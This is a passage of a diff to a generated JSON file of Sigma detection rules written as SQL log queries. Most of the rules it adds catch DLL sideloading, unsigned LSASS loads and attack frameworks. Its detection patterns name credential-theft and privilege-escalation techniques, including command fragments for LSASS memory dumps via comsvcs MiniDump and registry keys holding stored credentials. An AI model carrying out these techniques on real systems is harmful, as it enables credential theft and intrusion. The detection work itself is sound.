'%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior 
(Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of vss_ps.dll 
by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "status": "test", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.002" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", + "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of 
Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + ], + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + }, + { + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1070", "attack.persistence", - "attack.t1542.003" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], - "level": "medium", + 
"falsepositives": [ + "Unlikely" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "level": "medium", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "status": "test", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", - "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded 
LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential 
DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 